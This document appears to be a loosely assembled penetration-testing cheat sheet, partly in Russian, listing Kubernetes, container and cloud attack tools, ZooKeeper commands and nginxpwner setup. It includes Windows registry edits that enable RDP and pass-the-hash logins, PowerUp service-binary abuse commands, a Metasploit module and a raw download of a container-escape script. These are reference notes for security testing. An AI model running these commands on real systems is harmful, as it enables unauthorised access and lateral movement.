* kube-hunter - мощный инструмент от Aqua Security

* kubescape - выявление мисконфигов кластера, RBAC, скан образов

* kdigger - тулза для разведки окружения

* kubeletctl - кастомный клиент для общения с kebelet

* peirates - мульти-комбайн тулза для пентеста кластера, в том числе изнутри pod'а

* BOtB - инструмент для анализа и эксплуатации контейнеров

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

xfreerdp /v:10.10.10.10 /u:username /pth:<NT_HASH> /dynamic-resolution +clipboard

* Token/Privilege Enumeration
* Service Enumeration
* DLL Hijacking
* Registry Checks

PS C:\Users\dave> Get-ModifiableServiceFile

PS C:\Users\dave> Install-ServiceBinary -Name 'vulnService'

* hostNetwork
* hostPID
* hostPath
* hostIPC
* privileged

Also great to demonstrate why passing secrets as arguments on the command line is a bad idea.

* simulator (with AWS)
* kube_security_lab (On-premise)

* Shell via web
* common tools for kube pentest
* Bypass read-only container file system
* Bypass signature engine

* PurplePanda - поиск миссконфигов и privesc. Cloud/SaaS

* Prowler - проведение аудитов, реагирование на инциденты и многое другое в таких средах, как AWS, Azure, GCP и Kubernetes

* CloudSploit by Aqua - Cloud Security Scans

* ScoutSuite - Multi-Cloud Security Auditing Tool

* cartography
* starbase
* IceKube
* KubeHound

dump: Lists the outstanding sessions and ephemeral nodes. This only works on the leader.

envi: Print details about serving environment

kill: Shuts down the server. This must be issued from the machine the ZooKeeper server is running on

reqs: List outstanding requests

ruok: Tests if server is running in a non-error state. The server will respond with imok if it is running. Otherwise it will not respond at all

srst: Reset statistics returned by stat command

stat: Lists statistics about performance and connected clients

echo urok | nc 192.168.1.1 2181

msf > use auxiliary/gather/zookeeper_info_disclosure

* Link
* Link

* Link
* Link

* Reconnaissance - Link
* Abusing GitLab Runners - Link
* Script for steal tasks by requesting them faster than a real runner - Link

* deepce - noscript for Enumeration, Escalation of Privileges and Container Escapes written in pure sh

* CDK - K8s, Docker penetration toolkit

* botb - analysis and exploitation tool also being CI/CD friendly with common CI/CD technologies

* amicontained - Useful tool to get the privileges the container has in order to find ways to escape from it

* grype - Get the CVEs contained in the software installed in the image

* linpeas - It can also enumerate containers

(echo -ne "GET /stealthcopter/deepce/main/deepce.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: close\r\n\r\n"; sleep 3) | openssl s_client -connect raw.githubusercontent.com:443 -quiet > deepce.sh

cd /tmp
tee -a getFile.sh
<copy+paste the contents of the getFile.sh noscript>
<hit enter and the ctrl-d/cmd-d>
cat getFile.sh

URL=http://localhost:8000/file OUTPUT=file ./get.sh

git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
sudo docker build -t nginxpwner:latest .
sudo docker run -it nginxpwner:latest /bin/bash

* Gets Ngnix version and gets its possible exploits using searchsploit and tells if it is outdated

* Throws a wordlist specific to Nginx via gobuster

* Checks if it is vulnerable to CRLF via a common misconfiguration of using $uri in redirects

* Checks for CRLF in all of the paths provided

* Checks if the PURGE HTTP method is available from the outside

* Checks for variable leakage misconfiguration

etc